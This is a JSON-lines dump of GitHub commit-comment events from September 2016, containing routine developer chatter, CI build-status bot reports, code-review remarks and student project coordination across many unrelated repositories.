{"id":"4586719079","type":"CommitCommentEvent","actor":{"login":"sai2121"},"repo":{"name":"sai2121/Web-Springboard"},"payload":{"comment":{"id":19087981,"position":null,"line":null,"path":null,"commit_id":"5caacc723b574948a9a8ff82980c3fef934cd957","created_at":"2016-09-20T00:14:00Z","updated_at":"2016-09-20T00:14:00Z","body":"[Springboard.docx](https://github.com/sai2121/Web-Springboard/files/481375/Springboard.docx)\r\n"}},"created_at":"2016-09-20T00:14:00Z"}
{"id":"4586719901","type":"CommitCommentEvent","actor":{"login":"TaskClusterRobot"},"repo":{"name":"mozilla-releng/OpenCloudConfig"},"payload":{"comment":{"id":19087985,"position":null,"line":null,"path":null,"commit_id":"b315f59a9a589e11ead5799ab5087a3e7bb29d74","created_at":"2016-09-20T00:14:18Z","updated_at":"2016-09-20T00:14:18Z","body":"TaskCluster-GitHub: https://tools.taskcluster.net/task-graph-inspector/#OO5gHu0VSwKh7RFSXd0YOQ"}},"created_at":"2016-09-20T00:14:18Z"}
{"id":"4586720183","type":"CommitCommentEvent","actor":{"login":"alwyndavis"},"repo":{"name":"instaclustr/spark-cassandra-connector"},"payload":{"comment":{"id":19087988,"position":null,"line":null,"path":null,"commit_id":"98b389c2c5fd037f5407e99deec0be39eea07a53","created_at":"2016-09-20T00:14:23Z","updated_at":"2016-09-20T00:14:23Z","body":"Checked with Rob and it removes the byte order marker."}},"created_at":"2016-09-20T00:14:23Z"}
{"id":"4586720759","type":"CommitCommentEvent","actor":{"login":"KennethMatheusve"},"repo":{"name":"KennethMatheusve/WS_FE_INXAP_KM"},"payload":{"comment":{"id":19087989,"position":null,"line":null,"path":null,"commit_id":"25789df17ba94fb01514ce7530fbbb5f02237d30","created_at":"2016-09-20T00:14:34Z","updated_at":"2016-09-20T00:14:34Z","body":"cambio validado en código , a partir de ahora se usa para pruebas y pase a producción"}},"created_at":"2016-09-20T00:14:34Z"}
{"id":"4586723345","type":"CommitCommentEvent","actor":{"login":"KennethMatheusve"},"repo":{"name":"KennethMatheusve/WS_FE_INXAP_KM"},"payload":{"comment":{"id":19088003,"position":null,"line":null,"path":null,"commit_id":"25789df17ba94fb01514ce7530fbbb5f02237d30","created_at":"2016-09-20T00:15:23Z","updated_at":"2016-09-20T00:15:23Z","body":"ok esta bien "}},"created_at":"2016-09-20T00:15:23Z"}
{"id":"4586728432","type":"CommitCommentEvent","actor":{"login":"seanf"},"repo":{"name":"zanata/zanata-server"},"payload":{"comment":{"id":19088017,"position":null,"line":null,"path":null,"commit_id":"a61c22606625099a2ba61dee71e9a36a6eb45112","created_at":"2016-09-20T00:17:02Z","updated_at":"2016-09-20T00:17:02Z","body":"@aeng Why not?"}},"created_at":"2016-09-20T00:17:02Z"}
{"id":"4586733535","type":"CommitCommentEvent","actor":{"login":"tyler-sassaman"},"repo":{"name":"dssquared/Networks_Lab1"},"payload":{"comment":{"id":19088026,"position":null,"line":null,"path":null,"commit_id":"7f346391ef0d0872b3513fb4d0f4e6f1a8c774f1","created_at":"2016-09-20T00:18:40Z","updated_at":"2016-09-20T00:18:40Z","body":"So what is left to be done?"}},"created_at":"2016-09-20T00:18:40Z"}
{"id":"4586735578","type":"CommitCommentEvent","actor":{"login":"kamaal44"},"repo":{"name":"eslint/typescript-eslint-parser"},"payload":{"comment":{"id":19088035,"position":null,"line":null,"path":null,"commit_id":"e34f6b4921f4340c356a27d1885192a1be03a680","created_at":"2016-09-20T00:19:21Z","updated_at":"2016-09-20T00:19:21Z","body":"![img_20160917_193232](https://cloud.githubusercontent.com/assets/21346416/18653047/d959bf4e-7edf-11e6-9016-92dec6b00844.jpg)\r\n``php# github #92 "}},"created_at":"2016-09-20T00:19:21Z"}
{"id":"4586736740","type":"CommitCommentEvent","actor":{"login":"aeng"},"repo":{"name":"zanata/zanata-server"},"payload":{"comment":{"id":19088037,"position":null,"line":null,"path":null,"commit_id":"a61c22606625099a2ba61dee71e9a36a6eb45112","created_at":"2016-09-20T00:19:44Z","updated_at":"2016-09-20T00:19:44Z","body":"@seanf, reliased the issue yesterday. Will fix it as part of merge with master."}},"created_at":"2016-09-20T00:19:44Z"}
{"id":"4586742975","type":"CommitCommentEvent","actor":{"login":"roshanjoe"},"repo":{"name":"roshanjoe/hello-world"},"payload":{"comment":{"id":19088049,"position":2,"line":2,"path":"README.md","commit_id":"d91d41ed2aaa3a168022fd94f4ec801906e1a1bb","created_at":"2016-09-20T00:21:42Z","updated_at":"2016-09-20T00:21:42Z","body":"this is test\r\n\r\nas last test didn't work."}},"created_at":"2016-09-20T00:21:42Z"}
{"id":"4586754657","type":"CommitCommentEvent","actor":{"login":"jbrower95"},"repo":{"name":"nate-parrott/fast-news"},"payload":{"comment":{"id":19088078,"position":null,"line":null,"path":null,"commit_id":"48b4b34a7e53d6698600a0f9d5f855bdada5e26d","created_at":"2016-09-20T00:25:20Z","updated_at":"2016-09-20T00:25:20Z","body":"cool"}},"created_at":"2016-09-20T00:25:20Z"}
{"id":"4586755165","type":"CommitCommentEvent","actor":{"login":"nrel-bot-2"},"repo":{"name":"NREL/EnergyPlus"},"payload":{"comment":{"id":19088081,"position":null,"line":null,"path":null,"commit_id":"00421f20cd8ea3727e2d13d4a7428d370b67c7a8","created_at":"2016-09-20T00:25:29Z","updated_at":"2016-09-20T00:25:29Z","body":"129956421-Scalable-Sizing-HTRad-Heat-Crash (RKStrand) - x86_64-Linux-Ubuntu-14.04-gcc-4.8-IntegrationCoverage-Debug: OK (1766 of 1767 tests passed, 0 test warnings)\n\n\n\n<a href='https://nrel.github.io/EnergyPlusBuildResults/EnergyPlus-00421f20cd8ea3727e2d13d4a7428d370b67c7a8-x86_64-Linux-Ubuntu-14.04-gcc-4.8-IntegrationCoverage-Debug.html'>![Build Badge](http://img.shields.io/badge/build%20status-passing-green.svg)</a> <a href='https://nrel.github.io/EnergyPlusBuildResults/EnergyPlus-00421f20cd8ea3727e2d13d4a7428d370b67c7a8-x86_64-Linux-Ubuntu-14.04-gcc-4.8-IntegrationCoverage-Debug.html'>![Test Badge](http://img.shields.io/badge/tests%20passed-99.94%25-yellow.svg)</a> <a href='https://nrel.github.io/EnergyPlusBuildResults/EnergyPlus-00421f20cd8ea3727e2d13d4a7428d370b67c7a8-x86_64-Linux-Ubuntu-14.04-gcc-4.8-IntegrationCoverage-Debug.html'>![Coverage Badge](http://img.shields.io/badge/coverage%20status-70.9%25-green.svg)</a>\n"}},"created_at":"2016-09-20T00:25:29Z"}
{"id":"4586755856","type":"CommitCommentEvent","actor":{"login":"dssquared"},"repo":{"name":"dssquared/Networks_Lab1"},"payload":{"comment":{"id":19088083,"position":null,"line":null,"path":null,"commit_id":"7f346391ef0d0872b3513fb4d0f4e6f1a8c774f1","created_at":"2016-09-20T00:25:42Z","updated_at":"2016-09-20T00:25:42Z","body":"need to finish http stuff which I am working on now, need to do html part\nto display board(could be done last or if someone wants to do it now) , and\nneed to maintain a txt file for the board on the client side. I should be\nable to get the http stuff done, if not I may ask for help. I am not sure\nhow to control the work flow on the server, it starts a server connection\nbut the methods are never called. Before the socket stuff had to be in an\ninfinite loop and the methods were called as needed. Now the http server\n'serves forever' and that is the end of main. We may have to incorporate\nthe method calls from the http part, not sure yet, I am reading the docs\nfor the simpleHTTPServe library now.\n\nOn Mon, Sep 19, 2016 at 6:18 PM, tyler-sassaman <notifications@github.com>\nwrote:\n\n> So what is left to be done?\n>\n> —\n> You are receiving this because you authored the thread.\n> Reply to this email directly, view it on GitHub\n> <https://github.com/dssquared/Networks_Lab1/commit/7f346391ef0d0872b3513fb4d0f4e6f1a8c774f1#commitcomment-19088026>,\n> or mute the thread\n> <https://github.com/notifications/unsubscribe-auth/AE8DGyWq35fzEmt-EUiDbTtH_uWp3U2qks5qryZggaJpZM4KBGav>\n> .\n>\n"}},"created_at":"2016-09-20T00:25:42Z"}
{"id":"4586761442","type":"CommitCommentEvent","actor":{"login":"nikolricano"},"repo":{"name":"nikolricano/desafiolatam"},"payload":{"comment":{"id":19088094,"position":1,"line":1,"path":"tarea190716.txt","commit_id":"5000b0f16c9b495079c1e9b06ca9b37c59aa44a3","created_at":"2016-09-20T00:27:28Z","updated_at":"2016-09-20T00:27:28Z","body":"\r\nGIT es el software que rastrea. El sistema de control de versiones. La herramienta que utilizaremos en la terminal.\r\n\r\n\r\nGitHub es la plataforma de \"hosting\" de los proyectos. Una comunidad llena de personas que desarrollan y comparten, usando GIT. \r\n\r\n\r\nSe complementan, pero son personajes independientes.\r\n\r\n"}},"created_at":"2016-09-20T00:27:28Z"}
{"id":"4586763589","type":"CommitCommentEvent","actor":{"login":"GrayHatForums"},"repo":{"name":"Ekultek/whitewidow"},"payload":{"comment":{"id":19088099,"position":null,"line":null,"path":null,"commit_id":"c1e5760330f66208170a5a0bb7c58b018d7e09ce","created_at":"2016-09-20T00:28:11Z","updated_at":"2016-09-20T00:28:11Z","body":"ah GHF no longer allows Mobile Access, use your pc, or tor on ur phone. no ip is banned in ACP we recently started over. bc i couldnt get back up files from dads pc"}},"created_at":"2016-09-20T00:28:11Z"}
{"id":"4586765657","type":"CommitCommentEvent","actor":{"login":"GrayHatForums"},"repo":{"name":"Ekultek/whitewidow"},"payload":{"comment":{"id":19088106,"position":null,"line":null,"path":null,"commit_id":"c1e5760330f66208170a5a0bb7c58b018d7e09ce","created_at":"2016-09-20T00:28:51Z","updated_at":"2016-09-20T00:28:51Z","body":"our group chat https://grayhatforums.hipchat.com/invite/631001/0c3f1f313dba132a3ea4bd058d471663?utm_campaign=company_room_link"}},"created_at":"2016-09-20T00:28:51Z"}
{"id":"4586765742","type":"CommitCommentEvent","actor":{"login":"nrel-bot-2"},"repo":{"name":"NREL/EnergyPlus"},"payload":{"comment":{"id":19088108,"position":null,"line":null,"path":null,"commit_id":"22c4a04f5e4e54d66cb51f00a286a6f412468fd0","created_at":"2016-09-20T00:28:53Z","updated_at":"2016-09-20T00:28:53Z","body":"ASIHPValidation (mjwitte) - x86_64-Linux-Ubuntu-14.04-cppcheck-1.61: OK (0 of 0 tests passed, 0 test warnings)\n\n\n\n<a href='https://nrel.github.io/EnergyPlusBuildResults/EnergyPlus-22c4a04f5e4e54d66cb51f00a286a6f412468fd0-x86_64-Linux-Ubuntu-14.04-cppcheck-1.61.html'>![Build Badge](http://img.shields.io/badge/build%20status-passing-green.svg)</a>  \n"}},"created_at":"2016-09-20T00:28:53Z"}
{"id":"4586769377","type":"CommitCommentEvent","actor":{"login":"sant0ro"},"repo":{"name":"sant0ro/Yupi"},"payload":{"comment":{"id":19088117,"position":24,"line":24,"path":"Yupi.Crypto/Utils/BigIntegerPrime.cs","commit_id":"b2a904df26fa8a303c7e01dd2b52666eadbf9fb7","created_at":"2016-09-20T00:30:06Z","updated_at":"2016-09-20T00:30:06Z","body":"That's a huge method omg.."}},"created_at":"2016-09-20T00:30:06Z"}
{"id":"4586772113","type":"CommitCommentEvent","actor":{"login":"fbarriosCL"},"repo":{"name":"patojimenez/actioncable-notification"},"payload":{"comment":{"id":19088123,"position":null,"line":null,"path":null,"commit_id":"d534eb79c6e62c2b692cb71f6143d3393dfc5092","created_at":"2016-09-20T00:30:54Z","updated_at":"2016-09-20T00:30:54Z","body":"ward "}},"created_at":"2016-09-20T00:30:54Z"}
{"id":"4586775042","type":"CommitCommentEvent","actor":{"login":"jupmorenor"},"repo":{"name":"jmromeroes/TheGreatBattle"},"payload":{"comment":{"id":19088132,"position":null,"line":null,"path":null,"commit_id":"67eb20baee1833c12b075a09048d6630f8f0216a","created_at":"2016-09-20T00:31:49Z","updated_at":"2016-09-20T00:31:49Z","body":"De que se trata todo esto?"}},"created_at":"2016-09-20T00:31:49Z"}
{"id":"4586777172","type":"CommitCommentEvent","actor":{"login":"dssquared"},"repo":{"name":"dssquared/Networks_Lab1"},"payload":{"comment":{"id":19088138,"position":null,"line":null,"path":null,"commit_id":"7f346391ef0d0872b3513fb4d0f4e6f1a8c774f1","created_at":"2016-09-20T00:32:31Z","updated_at":"2016-09-20T00:32:31Z","body":"client side might pretty simple, if anyone wants to read up to help\nunderstand how to incorporate the rest of the program here is a link to\nsome docs\nhttps://docs.python.org/2/library/httplib.html\n\nThe server side may be a little more tricky, it is using simpleHTTPServer\nhttps://docs.python.org/2/library/simplehttpserver.html\n\n\n\nOn Mon, Sep 19, 2016 at 6:25 PM, David Schwehr <dpschwehr@gmail.com> wrote:\n\n> need to finish http stuff which I am working on now, need to do html part\n> to display board(could be done last or if someone wants to do it now) , and\n> need to maintain a txt file for the board on the client side. I should be\n> able to get the http stuff done, if not I may ask for help. I am not sure\n> how to control the work flow on the server, it starts a server connection\n> but the methods are never called. Before the socket stuff had to be in an\n> infinite loop and the methods were called as needed. Now the http server\n> 'serves forever' and that is the end of main. We may have to incorporate\n> the method calls from the http part, not sure yet, I am reading the docs\n> for the simpleHTTPServe library now.\n>\n> On Mon, Sep 19, 2016 at 6:18 PM, tyler-sassaman <notifications@github.com>\n> wrote:\n>\n>> So what is left to be done?\n>>\n>> —\n>> You are receiving this because you authored the thread.\n>> Reply to this email directly, view it on GitHub\n>> <https://github.com/dssquared/Networks_Lab1/commit/7f346391ef0d0872b3513fb4d0f4e6f1a8c774f1#commitcomment-19088026>,\n>> or mute the thread\n>> <https://github.com/notifications/unsubscribe-auth/AE8DGyWq35fzEmt-EUiDbTtH_uWp3U2qks5qryZggaJpZM4KBGav>\n>> .\n>>\n>\n>\n"}},"created_at":"2016-09-20T00:32:31Z"}
{"id":"4586782813","type":"CommitCommentEvent","actor":{"login":"Hainish"},"repo":{"name":"EFForg/https-everywhere"},"payload":{"comment":{"id":19088156,"position":null,"line":null,"path":null,"commit_id":"5207ba15ce2c52ca71c4567df49d3d14e3ff4007","created_at":"2016-09-20T00:34:19Z","updated_at":"2016-09-20T00:34:19Z","body":"@gloomy-ghost thanks, removed in PR https://github.com/EFForg/https-everywhere/pull/6914"}},"created_at":"2016-09-20T00:34:19Z"}
{"id":"4586797731","type":"CommitCommentEvent","actor":{"login":"dssquared"},"repo":{"name":"dssquared/Networks_Lab1"},"payload":{"comment":{"id":19088195,"position":null,"line":null,"path":null,"commit_id":"7f346391ef0d0872b3513fb4d0f4e6f1a8c774f1","created_at":"2016-09-20T00:39:17Z","updated_at":"2016-09-20T00:39:17Z","body":"Not seeing much to handle post and get requests in simpleHTTPServer, maybe\nbaseHTTPServer???\nMight have to switch libraries for the server side.......again.\n\nOn Mon, Sep 19, 2016 at 6:32 PM, David Schwehr <dpschwehr@gmail.com> wrote:\n\n> client side might pretty simple, if anyone wants to read up to help\n> understand how to incorporate the rest of the program here is a link to\n> some docs\n> https://docs.python.org/2/library/httplib.html\n>\n> The server side may be a little more tricky, it is using simpleHTTPServer\n> https://docs.python.org/2/library/simplehttpserver.html\n>\n>\n>\n> On Mon, Sep 19, 2016 at 6:25 PM, David Schwehr <dpschwehr@gmail.com>\n> wrote:\n>\n>> need to finish http stuff which I am working on now, need to do html part\n>> to display board(could be done last or if someone wants to do it now) , and\n>> need to maintain a txt file for the board on the client side. I should be\n>> able to get the http stuff done, if not I may ask for help. I am not sure\n>> how to control the work flow on the server, it starts a server connection\n>> but the methods are never called. Before the socket stuff had to be in an\n>> infinite loop and the methods were called as needed. Now the http server\n>> 'serves forever' and that is the end of main. We may have to incorporate\n>> the method calls from the http part, not sure yet, I am reading the docs\n>> for the simpleHTTPServe library now.\n>>\n>> On Mon, Sep 19, 2016 at 6:18 PM, tyler-sassaman <notifications@github.com\n>> > wrote:\n>>\n>>> So what is left to be done?\n>>>\n>>> —\n>>> You are receiving this because you authored the thread.\n>>> Reply to this email directly, view it on GitHub\n>>> <https://github.com/dssquared/Networks_Lab1/commit/7f346391ef0d0872b3513fb4d0f4e6f1a8c774f1#commitcomment-19088026>,\n>>> or mute the thread\n>>> <https://github.com/notifications/unsubscribe-auth/AE8DGyWq35fzEmt-EUiDbTtH_uWp3U2qks5qryZggaJpZM4KBGav>\n>>> .\n>>>\n>>\n>>\n>\n"}},"created_at":"2016-09-20T00:39:17Z"}
{"id":"4586807274","type":"CommitCommentEvent","actor":{"login":"rmacklin"},"repo":{"name":"AppFolioOnboarding/image-sharer-kkajla12"},"payload":{"comment":{"id":19088217,"position":6,"line":9,"path":"test/page_objects/images/show_page.rb","commit_id":"c26192e04d9184b7f8c6ff5f914c3d072849b05e","created_at":"2016-09-20T00:42:30Z","updated_at":"2016-09-20T00:42:30Z","body":"Neat! I didn't know about the `prefix` option."}},"created_at":"2016-09-20T00:42:30Z"}
{"id":"4586812709","type":"CommitCommentEvent","actor":{"login":"amazingr4b"},"repo":{"name":"amazingr4b/TBN-Plex"},"payload":{"comment":{"id":19088236,"position":null,"line":null,"path":null,"commit_id":"208179f6cb97100683d499fbfdd0a5c9b6960154","created_at":"2016-09-20T00:44:23Z","updated_at":"2016-09-20T00:44:23Z","body":"For testing an additional stop option has been added: awaystop. This action will first get the details of what is now playing, set that to the up next item in your queue, then stop playback. This is so you can resume an item later. Currently it does not automatically enable resume playback, but I am considering that change in the future. \r\nAdditionally, the playwhereleftoff command now supports TV shows in addition to movies. By extension, the resumeplay option will resume both shows and movies when enabled. "}},"created_at":"2016-09-20T00:44:23Z"}
{"id":"4586814498","type":"CommitCommentEvent","actor":{"login":"MatthewVance"},"repo":{"name":"MatthewVance/nginx-build"},"payload":{"comment":{"id":19088242,"position":null,"line":null,"path":null,"commit_id":"2cd439db9296a04bcdf3c18071c44700916eac33","created_at":"2016-09-20T00:45:00Z","updated_at":"2016-09-20T00:45:00Z","body":"Thanks. It's possible that flag might break it. I haven't tested it on my Pi recently like I should. Been using it on straight Debian and a version of this I developed for Docker. Feel free to submit a pull request to remove the flag. I think it's main benefit is speed for systems that support it. \n\n> On Sep 19, 2016, at 6:32 PM, Steve M <notifications@github.com> wrote:\n> \n> Looks like enable-ec_nistp_64_gcc_128 breaks things on RasPi. Should check the output of '''gcc -dM -E - </dev/null | grep SIZEOF_INT128''' to ensure that it can be enabled\n> \n> —\n> You are receiving this because you authored the thread.\n> Reply to this email directly, view it on GitHub, or mute the thread.\n> \n"}},"created_at":"2016-09-20T00:45:00Z"}
{"id":"4586816040","type":"CommitCommentEvent","actor":{"login":"elliot-labs"},"repo":{"name":"elliot-labs/ARF-Converter"},"payload":{"comment":{"id":19088244,"position":null,"line":null,"path":null,"commit_id":"15ef44d7ef5e83b927b8e0645d362fba88a61aec","created_at":"2016-09-20T00:45:30Z","updated_at":"2016-09-20T00:45:30Z","body":"This is the class update for the GUI version"}},"created_at":"2016-09-20T00:45:30Z"}
{"id":"4586819068","type":"CommitCommentEvent","actor":{"login":"copumpkin"},"repo":{"name":"NixOS/nixpkgs"},"payload":{"comment":{"id":19088251,"position":14,"line":303,"path":"lib/attrsets.nix","commit_id":"1c043e0749bd29f1393aa5375dd8962d744643e0","created_at":"2016-09-20T00:46:30Z","updated_at":"2016-09-20T00:46:30Z","body":"Man, that 33 is a really magic number 😄 "}},"created_at":"2016-09-20T00:46:30Z"}
{"id":"4586822508","type":"CommitCommentEvent","actor":{"login":"psideleau"},"repo":{"name":"psideleau/python"},"payload":{"comment":{"id":19088260,"position":null,"line":null,"path":null,"commit_id":"5aab2da02ab22221f2dc287de1d0cb1a869e031c","created_at":"2016-09-20T00:47:38Z","updated_at":"2016-09-20T00:47:38Z","body":"magic string. Please use a constant"}},"created_at":"2016-09-20T00:47:38Z"}
{"id":"4586824551","type":"CommitCommentEvent","actor":{"login":"jessicamorris"},"repo":{"name":"richardperryman/NFC-Engineering-Project"},"payload":{"comment":{"id":19088267,"position":null,"line":null,"path":null,"commit_id":"f01bd3e746b23e1cadef12c5d687b74d38fbb235","created_at":"2016-09-20T00:48:21Z","updated_at":"2016-09-20T00:48:21Z","body":"That is a solid question, and I have no idea what I'm doing that keeps adding that. I just noticed that I have three \\grids going in my latest copy... I will definitely be keeping an eye out for spontaneous \\grids before I push now."}},"created_at":"2016-09-20T00:48:21Z"}
{"id":"4586828856","type":"CommitCommentEvent","actor":{"login":"nenandu"},"repo":{"name":"nenandu/nenandu.github.io"},"payload":{"comment":{"id":19088281,"position":null,"line":null,"path":null,"commit_id":"cce5f989c1ec7aa9c5e90a3fd9caef89610379cb","created_at":"2016-09-20T00:49:49Z","updated_at":"2016-09-20T00:49:49Z","body":"updated"}},"created_at":"2016-09-20T00:49:49Z"}
{"id":"4586833256","type":"CommitCommentEvent","actor":{"login":"MoondanceZ"},"repo":{"name":"MoondanceZ/IFE_BAIDU"},"payload":{"comment":{"id":19088292,"position":null,"line":null,"path":null,"commit_id":"cb7e8d742709d6cbe8cb8edd70bc008aed5041ab","created_at":"2016-09-20T00:51:23Z","updated_at":"2016-09-20T00:51:23Z","body":"EIPsy"}},"created_at":"2016-09-20T00:51:23Z"}
{"id":"4586842751","type":"CommitCommentEvent","actor":{"login":"mzp"},"repo":{"name":"mzp/LoveLiver"},"payload":{"comment":{"id":19088350,"position":null,"line":null,"path":null,"commit_id":"40737918c0ed0e8f9318800f212399c06e3e14b4","created_at":"2016-09-20T00:54:41Z","updated_at":"2016-09-20T00:54:41Z","body":"We are not maintenancing CLI version now.\r\n\r\nBut if you need it, please try old release(https://github.com/mzp/LoveLiver/releases/tag/0.1)"}},"created_at":"2016-09-20T00:54:41Z"}
{"id":"4586845899","type":"CommitCommentEvent","actor":{"login":"nrel-bot-3"},"repo":{"name":"NREL/OpenStudio"},"payload":{"comment":{"id":19088363,"position":null,"line":null,"path":null,"commit_id":"8cfc43ed51da94fac8a535820acc8fa8a39e52c2","created_at":"2016-09-20T00:55:40Z","updated_at":"2016-09-20T00:55:40Z","body":"EMS (brianlball) - x86_64-MacOS-10.10-clang: OK (2311 of 2475 tests passed, 0 test warnings)\n\n\n\n<a href='https://nrel.github.io/OpenStudioBuildResults/OpenStudio-8cfc43ed51da94fac8a535820acc8fa8a39e52c2-x86_64-MacOS-10.10-clang.html'>![Build Badge](http://img.shields.io/badge/build%20status-warnings-yellow.svg)</a> <a href='https://nrel.github.io/OpenStudioBuildResults/OpenStudio-8cfc43ed51da94fac8a535820acc8fa8a39e52c2-x86_64-MacOS-10.10-clang.html'>![Test Badge](http://img.shields.io/badge/tests%20passed-93.37%25-yellow.svg)</a> \n"}},"created_at":"2016-09-20T00:55:40Z"}
{"id":"4586848065","type":"CommitCommentEvent","actor":{"login":"forno"},"repo":{"name":"CIR-KIT/fifth_robot_pkg"},"payload":{"comment":{"id":19088375,"position":null,"line":null,"path":null,"commit_id":"125520ae3dc4a0f0f53e084941261943fc3b8ea1","created_at":"2016-09-20T00:56:20Z","updated_at":"2016-09-20T00:56:20Z","body":"Motor driver という素子に5Vと24Vを供給しなければならないことが示せればどう動かすかはもんだいでは無いかと思います。"}},"created_at":"2016-09-20T00:56:20Z"}
{"id":"4586848194","type":"CommitCommentEvent","actor":{"login":"iotsupport"},"repo":{"name":"mzp/LoveLiver"},"payload":{"comment":{"id":19088376,"position":null,"line":null,"path":null,"commit_id":"40737918c0ed0e8f9318800f212399c06e3e14b4","created_at":"2016-09-20T00:56:23Z","updated_at":"2016-09-20T00:56:23Z","body":"Gracias por tu mensaje al buzón de soporte de la Plataforma\nIoT de Telefónica, te responderemos lo antes posible.\n\nOn September 20, 2016 at 2:56 AM mzp/LoveLiver wrote:\n\nWe are not maintenancing CLI version now.\n\nBut if you need it, please try old\nrelease(https://github.com/mzp/LoveLiver/releases/tag/0.1 ( https://github.com/mzp/LoveLiver/releases/tag/0.1 ))\n\n--\n\nYou are receiving this because you commented.\n\nReply to this email directly or view it on GitHub:\n\nhttps://github.com/mzp/LoveLiver/commit/40737918c0ed0e8f9318800f212399c06e3e14b4#commitcomment-19088350\n( https://github.com/mzp/LoveLiver/commit/40737918c0ed0e8f9318800f212399c06e3e14b4#commitcomment-19088350 )\n\n_______________________________________________\n\nIot_support mailing list\n\nIot_support@tid.es ( mailto:Iot_support@tid.es )\n\nhttps://listas.tid.es/mailman/listinfo/iot_support ( https://listas.tid.es/mailman/listinfo/iot_support )\n\nPowered by UserVoice. ( http://www.uservoice.com/powered-by?utm_campaign=poweredby&utm_medium=email&utm_source=ticket&uv_company=iot+partners&uv_contact_url=iot-partners.uservoice.com&uv_experience=email )"}},"created_at":"2016-09-20T00:56:23Z"}
{"id":"4586853555","type":"CommitCommentEvent","actor":{"login":"forno"},"repo":{"name":"CIR-KIT/fifth_robot_pkg"},"payload":{"comment":{"id":19088405,"position":20,"line":29,"path":"fig_power_supply_connection.txt","commit_id":"125520ae3dc4a0f0f53e084941261943fc3b8ea1","created_at":"2016-09-20T00:58:11Z","updated_at":"2016-09-20T00:58:11Z","body":"ここの変更っていらない空白が追加されただけみたいなので、止めてね。\r\ncommit前にdiffの癖をつけませう。GithubならPrecompireだ！"}},"created_at":"2016-09-20T00:58:11Z"}
{"id":"4586854508","type":"CommitCommentEvent","actor":{"login":"TaskClusterRobot"},"repo":{"name":"taskcluster/taskcluster-lib-monitor"},"payload":{"comment":{"id":19088416,"position":null,"line":null,"path":null,"commit_id":"fb3d64b8ea700cd6c23475d411872a43c4ab4aa1","created_at":"2016-09-20T00:58:29Z","updated_at":"2016-09-20T00:58:29Z","body":"Submitting the task to TaskCluster failed. Request payload must follow the schema: http://schemas.taskcluster.net/scheduler/v1/task-graph.json#Details:\n\n```js\n{\n    \"validation\": {\n        \"tasks\": {\n            \"schema\": {\n                \"0\": {\n                    \"schema\": {\n                        \"task\": {\n                            \"schema\": {\n                                \"metadata\": {\n                                    \"required\": true\n                                }\n                            }\n                        }\n                    }\n                }\n            }\n        }\n    }\n}\n```"}},"created_at":"2016-09-20T00:58:29Z"}
{"id":"4586856775","type":"CommitCommentEvent","actor":{"login":"Motospote"},"repo":{"name":"jjv360/InfoWatch"},"payload":{"comment":{"id":19088437,"position":null,"line":null,"path":null,"commit_id":"462ba5e3b392d288e6f4b099269106c461f9e345","created_at":"2016-09-20T00:59:14Z","updated_at":"2016-09-20T00:59:14Z","body":"Josh,\r\n\r\nHello, not sure if this is the best place to ask about this, but I couldn't find any other way to contact you. So I really like your watchface, it's especially useful for keeping track of my classes during the day. Now I have a science/ engineering project this year (I am a 9th Grader), and I'd very much like to make a pebble watchface. My idea is that it wouldn't even show the time, at least not the largest. The main focus would be the name of the next event, as well as the time remaining until that event. However, I am certainly not adept at coding in any language, and I was wondering how you achieved that little part of your watchface? How did you code that certain part?\r\n\r\nRespectfully,\r\nPT"}},"created_at":"2016-09-20T00:59:14Z"}
{"id":"4586858305","type":"CommitCommentEvent","actor":{"login":"forno"},"repo":{"name":"CIR-KIT/fifth_robot_pkg"},"payload":{"comment":{"id":19088449,"position":20,"line":29,"path":"fig_power_supply_connection.txt","commit_id":"125520ae3dc4a0f0f53e084941261943fc3b8ea1","created_at":"2016-09-20T00:59:45Z","updated_at":"2016-09-20T00:59:45Z","body":"compire -> compare\r\nというかむしろ preview changeだったわ"}},"created_at":"2016-09-20T00:59:45Z"}
{"id":"4586858532","type":"CommitCommentEvent","actor":{"login":"ThisTestUser"},"repo":{"name":"ThisTestUser/Docs"},"payload":{"comment":{"id":19088454,"position":null,"line":null,"path":null,"commit_id":"ee739e1721641f4655aafd3d0cddd9b7defd69f0","created_at":"2016-09-20T00:59:50Z","updated_at":"2016-09-20T00:59:50Z","body":"@mcccs Did you see it from here? https://www.youtube.com/watch?v=eTp-bdnvSiQ\r\nTo me, a bypass is a mod that originally doesn't work but the client authors found a workaround for it.\r\nIn that video, he only used ChestStealer, AutoArmor, and Triggerbot, non of which are detectable by GWEN.\r\n(For combat mods, GWEN detects all auras that face towards entities)"}},"created_at":"2016-09-20T00:59:50Z"}
{"id":"4586860485","type":"CommitCommentEvent","actor":{"login":"nrel-bot-2"},"repo":{"name":"NREL/EnergyPlus"},"payload":{"comment":{"id":19088471,"position":null,"line":null,"path":null,"commit_id":"22c4a04f5e4e54d66cb51f00a286a6f412468fd0","created_at":"2016-09-20T01:00:26Z","updated_at":"2016-09-20T01:00:26Z","body":"ASIHPValidation (mjwitte) - x86_64-Linux-Ubuntu-14.04-gcc-4.8-UnitTestsCoverage-Debug: OK (1192 of 1192 tests passed, 0 test warnings)\n\n\n\n<a href='https://nrel.github.io/EnergyPlusBuildResults/EnergyPlus-22c4a04f5e4e54d66cb51f00a286a6f412468fd0-x86_64-Linux-Ubuntu-14.04-gcc-4.8-UnitTestsCoverage-Debug.html'>![Build Badge](http://img.shields.io/badge/build%20status-passing-green.svg)</a> <a href='https://nrel.github.io/EnergyPlusBuildResults/EnergyPlus-22c4a04f5e4e54d66cb51f00a286a6f412468fd0-x86_64-Linux-Ubuntu-14.04-gcc-4.8-UnitTestsCoverage-Debug.html'>![Test Badge](http://img.shields.io/badge/tests%20passed-100.0%25-green.svg)</a> <a href='https://nrel.github.io/EnergyPlusBuildResults/EnergyPlus-22c4a04f5e4e54d66cb51f00a286a6f412468fd0-x86_64-Linux-Ubuntu-14.04-gcc-4.8-UnitTestsCoverage-Debug.html'>![Coverage Badge](http://img.shields.io/badge/coverage%20status-36.11%25-green.svg)</a>\n"}},"created_at":"2016-09-20T01:00:26Z"}
{"id":"4586860534","type":"CommitCommentEvent","actor":{"login":"bimoQi"},"repo":{"name":"bimoQi/bimo"},"payload":{"comment":{"id":19088472,"position":2,"line":2,"path":"README.md","commit_id":"b4013e70445ac118b1d8653a46317fe9b40a1c2d","created_at":"2016-09-20T01:00:27Z","updated_at":"2016-09-20T01:00:27Z","body":"Personal blog"}},"created_at":"2016-09-20T01:00:27Z"}
